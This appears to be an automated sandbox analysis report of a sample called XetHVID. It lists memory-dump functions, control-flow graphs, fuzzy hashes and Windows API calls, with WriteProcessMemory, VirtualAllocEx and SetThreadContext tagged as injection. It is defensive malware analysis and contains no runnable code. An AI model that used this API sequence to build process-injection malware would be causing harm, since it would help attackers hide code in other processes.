                                                                  control_flow_graph 525 73c6c81-73c6f48 527 73c6f4f-73c6f52 525->527 528 73c731c-73c7351 call 73c6e88 527->528 529 73c6f58-73c6f60 527->529 530 73c6f6b-73c6f6d 529->530 531 73c6f62-73c6f69 529->531 532 73c6f72-73c6f7a 530->532 534 73c6fa1-73c6fd5 531->534 532->528 535 73c6f80-73c6f87 532->535 546 73c6fed-73c7014 534->546 547 73c6fd7-73c6fdd 534->547 537 73c6f89-73c6f90 535->537 538 73c6f92-73c6f96 535->538 541 73c6f98-73c6f9f 537->541 538->532 538->541 541->527 541->534 552 73c703a-73c7079 546->552 553 73c7016-73c702b 546->553 548 73c6fdf 547->548 549 73c6fe1-73c6fe3 547->549 548->546 549->546 563 73c707b-73c7081 552->563 564 73c70a3-73c7120 552->564 558 73c72b7-73c72e2 553->558 568 73c72e4-73c72eb 558->568 569 73c7317 558->569 563->528 565 73c7087-73c70a1 563->565 577 73c714e-73c7151 564->577 578 73c7122-73c7148 564->578 565->563 565->564 579 73c717f-73c7182 577->579 580 73c7153-73c7179 577->580 578->577 581 73c7184-73c71aa 579->581 582 73c71b0-73c71b3 579->582 580->579 581->582 583 73c71ef-73c721f 582->583 584 73c71b5-73c71ba 582->584 588 73c7238-73c7244 583->588 589 73c7221-73c7236 583->589 585 73c71eb-73c71ed 584->585 585->583 586 73c71bc-73c71ea 585->586 586->585 590 73c724d-73c72a6 588->590 589->590 594 73c72ae 590->594 594->558
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4'dq$F$R$phq
                                                                  • API String ID: 0-3172865906
                                                                  • Opcode ID: 6d4eb6b5405ebbaa378c0b09cdf069d4c5bd899d5864de92b4779964a26ddcc4
                                                                  • Instruction ID: 33888b4e97d9239f494d5086c9b3966732be257df3178673051b59461ab1d6e9
                                                                  • Opcode Fuzzy Hash: 6d4eb6b5405ebbaa378c0b09cdf069d4c5bd899d5864de92b4779964a26ddcc4
                                                                  • Instruction Fuzzy Hash: FDD104B6600114EFDB06DFA8C984D69BBB6FF49314B1680A9E6099F272C732EC51DF50
                                                                  Function 08CFA348 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 595 8cfa348-8cfa35f 597 8cfa3c2-8cfa3d0 595->597 598 8cfa361-8cfa370 595->598 601 8cfa3e3-8cfa3e5 597->601 602 8cfa3d2-8cfa3dd call 8cf8a34 597->602 598->597 603 8cfa372-8cfa37e call 8cf8a74 598->603 608 8cfa3ec-8cfa3fb 601->608 602->601 609 8cfa4a1-8cfa515 602->609 610 8cfa392-8cfa3ae 603->610 611 8cfa380-8cfa38c call 8cf8a84 603->611 615 8cfa3fd-8cfa40c 608->615 616 8cfa413-8cfa416 608->616 640 8cfa52d-8cfa52e 609->640 641 8cfa517-8cfa51d 609->641 623 8cfa45c-8cfa49a 610->623 624 8cfa3b4-8cfa3b8 610->624 611->610 619 8cfa417-8cfa455 611->619 615->616 619->623 623->609 624->597 642 8cfa51f 641->642 643 8cfa521-8cfa523 641->643 642->640 643->640
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1731409307.0000000008CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08CF0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_8cf0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hhq$Hhq$Hhq
                                                                  • API String ID: 0-327223379
                                                                  • Opcode ID: cc1239efcb787f3b8dbeac21e552dbf13164b3d8f02795c3d17d639a925c4811
                                                                  • Instruction ID: 535f417d21c72ed8152b605a69f8260903cf59a7d15df8b6b75da8ff42119ace
                                                                  • Opcode Fuzzy Hash: cc1239efcb787f3b8dbeac21e552dbf13164b3d8f02795c3d17d639a925c4811
                                                                  • Instruction Fuzzy Hash: 2741E0347002518BDBA9AF79A42462E77E7AFC4306B54487DD606CB786DF28DD03C721
                                                                  Function 073C9250 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 644 73c9250-73c9276 645 73c9333-73c9342 644->645 647 73c934d-73c93ae 645->647 662 73c932a 647->662 664 73c9287-73c9331 662->664 665 73c9280 662->665 664->662 665->645 665->664 666 73c9315-73c9329 665->666 667 73c92b7-73c92d5 665->667 672 73c92dc-73c92e9 667->672 673 73c92d7-73c92da 667->673 674 73c92eb-73c92fa 672->674 673->674 677 73c92fc-73c9302 674->677 678 73c9312 674->678 679 73c9304 677->679 680 73c9306-73c9308 677->680 678->666 679->678 680->678
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8hq$8hq$8hq
                                                                  • API String ID: 0-1838490158
                                                                  • Opcode ID: c75bcda0af016a9cbc0445bbf592162ab24990bb32b9d01272021e00680cdd23
                                                                  • Instruction ID: 82de481df02c57db2a229f11e96bf65bdb81603eb18806988507389b698e0e53
                                                                  • Opcode Fuzzy Hash: c75bcda0af016a9cbc0445bbf592162ab24990bb32b9d01272021e00680cdd23
                                                                  • Instruction Fuzzy Hash: 5731C4F4A1420ADBEB00DA94C45177E77B9EB89300F53445ED94AE7BC1DB366C0287A6
                                                                  Function 073C839F Relevance: 3.8, Strings: 3, Instructions: 39COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 703 73c839f-73c83d7 705 73c83e0-73c83e2 703->705 706 73c83fa-73c8417 705->706 707 73c83e4-73c83ea 705->707 711 73c841d-73c8513 706->711 712 73c8582-73c8587 706->712 708 73c83ec 707->708 709 73c83ee-73c83f0 707->709 708->706 709->706
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$$dq$$dq
                                                                  • API String ID: 0-2227312764
                                                                  • Opcode ID: 37a76c2a6acd216e1f5a0c2205a2ca04df66234d93a43ef4511a6f1369367a6d
                                                                  • Instruction ID: 289d3dd50df5fa8d216482a3e1f8056635e4d174bfc5858a1351a44e1259107a
                                                                  • Opcode Fuzzy Hash: 37a76c2a6acd216e1f5a0c2205a2ca04df66234d93a43ef4511a6f1369367a6d
                                                                  • Instruction Fuzzy Hash: F301DBF0B50209CBF724CA24CC567E97665BB40700F144869DE099F6C1DAA55E50C791
                                                                  Function 073C2AD8 Relevance: 2.7, Strings: 2, Instructions: 221COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 715 73c2ad8-73c2ae7 716 73c2aef-73c2af1 715->716 717 73c2b0b-73c2b78 call 73c20d8 716->717 718 73c2af3-73c2b08 716->718 727 73c2b7e-73c2b80 717->727 728 73c2c24-73c2c3b 717->728 729 73c2b86-73c2b91 call 73c22f0 727->729 730 73c2cb0-73c2d57 727->730 743 73c2c3d-73c2c3f 728->743 744 73c2c41 728->744 735 73c2bae-73c2bb2 729->735 736 73c2b93-73c2b95 729->736 769 73c2d59-73c2d5f 730->769 770 73c2d60-73c2d81 730->770 740 73c2bb4-73c2bc8 call 73c2418 735->740 741 73c2c11-73c2c1a 735->741 738 73c2b97-73c2b9e 736->738 739 73c2ba0-73c2bab call 73c16cc 736->739 738->735 739->735 753 73c2bde-73c2be2 740->753 754 73c2bca-73c2bdb call 73c16cc 740->754 745 73c2c46-73c2c48 743->745 744->745 748 73c2c7d-73c2ca9 745->748 749 73c2c4a-73c2c76 745->749 748->730 749->748 755 73c2bea-73c2c03 753->755 756 73c2be4 753->756 754->753 765 73c2c0e 755->765 766 73c2c05 755->766 756->755 765->741 766->765 769->770
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (hq$Hhq
                                                                  • API String ID: 0-2633903351
                                                                  • Opcode ID: 05c63f2f9989663a17a4d2082f0b1363f840e1741a7cb6316687ec1523dc4ce1
                                                                  • Instruction ID: a1001d0e0608a10c77e3f841534ee611a4c97687eca08fdc085b068b83293802
                                                                  • Opcode Fuzzy Hash: 05c63f2f9989663a17a4d2082f0b1363f840e1741a7cb6316687ec1523dc4ce1
                                                                  • Instruction Fuzzy Hash: D27191B5A002199FEB14DF69D8046AFBBE6FF88310F14842DD549A7380DB389D46CBA5
                                                                  Function 0563E948 Relevance: 2.7, Strings: 2, Instructions: 210COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 776 563e948-563e9aa call 563dcf8 782 563ea10-563ea3c 776->782 783 563e9ac-563e9ae 776->783 784 563ea43-563ea4b 782->784 783->784 785 563e9b4-563e9c0 783->785 790 563ea52-563eb8d 784->790 785->790 791 563e9c6-563ea01 call 563dd04 785->791 808 563eb93-563eba1 790->808 802 563ea06-563ea0f 791->802 809 563eba3-563eba9 808->809 810 563ebaa-563ebf0 808->810 809->810 815 563ebf2-563ebf5 810->815 816 563ebfd 810->816 815->816 817 563ebfe 816->817 817->817
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Hhq$Hhq
                                                                  • API String ID: 0-2450388649
                                                                  • Opcode ID: 0dc08324dce785ecaab6cba92284a1828ef6c8195de4fe2b036c9658cfda1fcd
                                                                  • Instruction ID: da68fb5d3e815cd5c8126ca96cda42e59bc4e0fb2c0f2f662c55e5ef836dca62
                                                                  • Opcode Fuzzy Hash: 0dc08324dce785ecaab6cba92284a1828ef6c8195de4fe2b036c9658cfda1fcd
                                                                  • Instruction Fuzzy Hash: AD816C74E003589FCB08DFA9C9956EEBBF6FF88300F54856AE409AB350DB345945CBA1
                                                                  Function 073C82D0 Relevance: 2.6, Strings: 2, Instructions: 57COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 964 73c82d0-73c8335 call 73c839f 968 73c833b-73c833d 964->968 972 73c82fc-73c830b 968->972 973 73c82e6-73c82ec 968->973 974 73c830d-73c831a 972->974 975 73c833f-73c851f 972->975 976 73c82ee 973->976 977 73c82f0-73c82f2 973->977 974->975 978 73c831c-73c8332 974->978 976->972 977->972
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730076775.00000000073C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_73c0000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $dq$$dq
                                                                  • API String ID: 0-2340669324
                                                                  • Opcode ID: 5a5a009a213f3b296b74cc264415be61b4210e6500b0f6c3c8087990ff46577e
                                                                  • Instruction ID: 04c02f38856d48d97d1ea95bed8a0a510445d5e055023a3ccd66b5ee072b0442
                                                                  • Opcode Fuzzy Hash: 5a5a009a213f3b296b74cc264415be61b4210e6500b0f6c3c8087990ff46577e
                                                                  • Instruction Fuzzy Hash: 3511C4F4919219CFE350DB28D9082E6BBB9BB06344F1842AFD40DD7A42D7718F46C7A6
                                                                  Function 07655D6C Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07655FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 81b70471b68c06d2e0fa183d9f07bef40915b9e646f71019a61519f8359069a8
                                                                  • Instruction ID: c83b5044a0a8e3491f526df3fbb93c10deff42afdfba701456c6e8bf648aed07
                                                                  • Opcode Fuzzy Hash: 81b70471b68c06d2e0fa183d9f07bef40915b9e646f71019a61519f8359069a8
                                                                  • Instruction Fuzzy Hash: 92A18DB1D0031ADFDB20CF68C945BEDBBB2BF48310F1481A9D84AA7240DB749995DF92
                                                                  Function 07655D78 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07655FAE
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: 645ee7e05e3491c94eb90d6116f2362c68997b53d2f856fa822005c3768d0a74
                                                                  • Instruction ID: 8c59f9c25ef42fbc8d8fd541f0530aebf02ace8044f740d11973dd71a47605ea
                                                                  • Opcode Fuzzy Hash: 645ee7e05e3491c94eb90d6116f2362c68997b53d2f856fa822005c3768d0a74
                                                                  • Instruction Fuzzy Hash: C9917CB0D0031ACFDB24CFA8C944BEDBBB2BF48314F0481A9D84AA7250DB749995DF91
                                                                  Function 0135B300 Relevance: 1.7, APIs: 1, Instructions: 231COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0135B566
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 273bf80712212270f1b2ef7fe687f896ee3db1d0fcd04e275c2f09b6e3154a2f
                                                                  • Instruction ID: 266f7e1f789c23d6b1cc9a4cdbcb6582dfcda2650e88e1b9da6de07570278457
                                                                  • Opcode Fuzzy Hash: 273bf80712212270f1b2ef7fe687f896ee3db1d0fcd04e275c2f09b6e3154a2f
                                                                  • Instruction Fuzzy Hash: DF918A70A00B048FD765DF29D441B5ABBF2FF88708F008A2ED88AD7A55D774E945CB90
                                                                  Function 013544B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: a252bd28f4c86525e2613f3b56c7530c232d3c6075591664f3e2b3b3249548bb
                                                                  • Instruction ID: 1ae34ddb944df0ced7746281c52050c0527ad899b10d730c86221984f6b8611d
                                                                  • Opcode Fuzzy Hash: a252bd28f4c86525e2613f3b56c7530c232d3c6075591664f3e2b3b3249548bb
                                                                  • Instruction Fuzzy Hash: D141E0B0C0071DCBDB24DFA9C884B9EBBF5BF49708F20806AD409AB255DB756949CF90
                                                                  Function 0135590C Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateActCtxA.KERNEL32(?), ref: 013559C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: Create
                                                                  • String ID:
                                                                  • API String ID: 2289755597-0
                                                                  • Opcode ID: 13a2aca29f0ddd03caaaeea2231dd4f8889436409f0d132367c4be9803618ff0
                                                                  • Instruction ID: 44f803c0fff70b4d77059530be0088176fed0c775bf69767da4aee4fca2b29b6
                                                                  • Opcode Fuzzy Hash: 13a2aca29f0ddd03caaaeea2231dd4f8889436409f0d132367c4be9803618ff0
                                                                  • Instruction Fuzzy Hash: 8441DFB0C00719CBDB25DFA9C884BDDBBB1BF49704F20806AD419AB255DB756949CF90
                                                                  Function 07655AE8 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07655B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: e2da4f2d864d8af726f9867ffd138a51133ccd7bbba30a6b1c6745490cd02030
                                                                  • Instruction ID: 1d149b19c56488884e43b66c70b96cfb9982084b97215b3d2248af36d8d343ae
                                                                  • Opcode Fuzzy Hash: e2da4f2d864d8af726f9867ffd138a51133ccd7bbba30a6b1c6745490cd02030
                                                                  • Instruction Fuzzy Hash: A52146B19003499FCB10DFA9C885BEEBBF5FF48320F10842AE959A7241C7789954DBA5
                                                                  Function 07655AF0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07655B80
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessWrite
                                                                  • String ID:
                                                                  • API String ID: 3559483778-0
                                                                  • Opcode ID: 2e6a22685b5f1894bb6e9f6090bc4476afb73853f4b0b2606d331888dcf3439a
                                                                  • Instruction ID: b3689f1627143083bc8a232d93a1973e2ed4dfaeed6c64665f4271e7ec38b899
                                                                  • Opcode Fuzzy Hash: 2e6a22685b5f1894bb6e9f6090bc4476afb73853f4b0b2606d331888dcf3439a
                                                                  • Instruction Fuzzy Hash: BF2127B19003499FCF10DFA9C885BDEBBF5FF48310F108429E959A7241C7789954DBA5
                                                                  Function 07655BD9 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07655C60
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 06dc294303bfe4e96717c2d7a9a8ab7d5f2c3f7cc7bf32f802b460b33a4ecab6
                                                                  • Instruction ID: 23c8df2d1677c844829696d988c0b6e19df73e3a4014c225401a65f5f802e202
                                                                  • Opcode Fuzzy Hash: 06dc294303bfe4e96717c2d7a9a8ab7d5f2c3f7cc7bf32f802b460b33a4ecab6
                                                                  • Instruction Fuzzy Hash: CC2127B18003499FCB10DFAAC885AEEFBF5FF48320F14842DE559A7241C7349950DBA1
                                                                  Function 07655519 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0765559E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: 919bc13e152a66bcf7b418eaede833336a02b1a061cc7dda99ac4a6c526d572d
                                                                  • Instruction ID: 1f02dcf1ca2d90a1dc5be697af90dfc8e0485f588b843b4c43d28610c6dbd54f
                                                                  • Opcode Fuzzy Hash: 919bc13e152a66bcf7b418eaede833336a02b1a061cc7dda99ac4a6c526d572d
                                                                  • Instruction Fuzzy Hash: 6F2159B19003099FDB10DFAAC4857EEBBF5EF48324F148429D45AA7241DB789945CFA1
                                                                  Function 0135D090 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0135D78E,?,?,?,?,?), ref: 0135D84F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 95e917dae17b8669c3b3d2a264cd68ac53d4da5013a9ab5fd13240e6b6f34ef3
                                                                  • Instruction ID: d180f29982db674beff3417074cc2f4cbcd80cc632793e2592a637bdced613f6
                                                                  • Opcode Fuzzy Hash: 95e917dae17b8669c3b3d2a264cd68ac53d4da5013a9ab5fd13240e6b6f34ef3
                                                                  • Instruction Fuzzy Hash: 9821E5B5900348AFDB10CF9AD884ADEBFF4EB48714F14841AE918A3350D374A954CFA1
                                                                  Function 0135D7C0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0135D78E,?,?,?,?,?), ref: 0135D84F
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1724371145.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_1350000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 2dc5cdd26e2d71a026aec7851108f4f7ab6e00cedec12f7c6ae2833ff444c296
                                                                  • Instruction ID: 972e0dfc735b5066fc70b661d27624d87079b7685771f9f1721c1188541fcb24
                                                                  • Opcode Fuzzy Hash: 2dc5cdd26e2d71a026aec7851108f4f7ab6e00cedec12f7c6ae2833ff444c296
                                                                  • Instruction Fuzzy Hash: 8B21E4B5900348AFDB10CF9AD884AEEBFF4FB48324F14841AE918A7350D374A944CFA1
                                                                  Function 07655BE0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07655C60
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryProcessRead
                                                                  • String ID:
                                                                  • API String ID: 1726664587-0
                                                                  • Opcode ID: 2358bba36c05e46cb8da0ff6efdd709f802054b2735a46debef662f3f46f6eb8
                                                                  • Instruction ID: 3a3ffb3150861cffb18efc9062a04d1b5ee3eb9e2047c8eaf957fffe4b497e1e
                                                                  • Opcode Fuzzy Hash: 2358bba36c05e46cb8da0ff6efdd709f802054b2735a46debef662f3f46f6eb8
                                                                  • Instruction Fuzzy Hash: 262128B18003499FCB10DFAAC885AEEFBF5FF48310F50842DE959A7241C7349954DBA5
                                                                  Function 07655520 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0765559E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: ContextThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 983334009-0
                                                                  • Opcode ID: a9e98e80700cafc1025718f956be9a939f6e173ace9e33ec5bf78337fc0be139
                                                                  • Instruction ID: a3c6b9dfc67d09bfb646b8681e5dc61a6fb7e0808aec0bac0d4027636ced7c65
                                                                  • Opcode Fuzzy Hash: a9e98e80700cafc1025718f956be9a939f6e173ace9e33ec5bf78337fc0be139
                                                                  • Instruction Fuzzy Hash: 6B216AB19003098FCB10DFAAC4857EEBBF5EF48324F108429D41AA7241C7789944CFA1
                                                                  Function 0563FCA8 Relevance: 1.6, Strings: 1, Instructions: 310COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1729134860.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_5630000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (hq
                                                                  • API String ID: 0-4060669308
                                                                  • Opcode ID: e3a38054b6048902c9430d0bd11359f00bdcbde12259d9b513eb8da4a7ae8aa9
                                                                  • Instruction ID: ad9700e2e709730cf9bdf0bf0762fa500e5f823405c26d2714758232d1df0157
                                                                  • Opcode Fuzzy Hash: e3a38054b6048902c9430d0bd11359f00bdcbde12259d9b513eb8da4a7ae8aa9
                                                                  • Instruction Fuzzy Hash: 4E71EE31E05258EFCB14EBB8E4596AEBFB6EF85300F1484AAE445A7791CB349C05CB61
                                                                  Function 07655A28 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07655A9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 05f4cfd8b82bd017e74932d0da2826e56aa5e3b26dc701c0df94086010386028
                                                                  • Instruction ID: fdc67ba15d8f493b36687352a77b5ca39b09f548a36a0de7ff9f9e1f12ce1be8
                                                                  • Opcode Fuzzy Hash: 05f4cfd8b82bd017e74932d0da2826e56aa5e3b26dc701c0df94086010386028
                                                                  • Instruction Fuzzy Hash: C6118C728002499FCB10DFAAC844ADEFFF5EF88320F208419D91AA7250C7359910DFA0
                                                                  Function 07655A30 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07655A9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.1730447600.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7650000_XetHVID.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
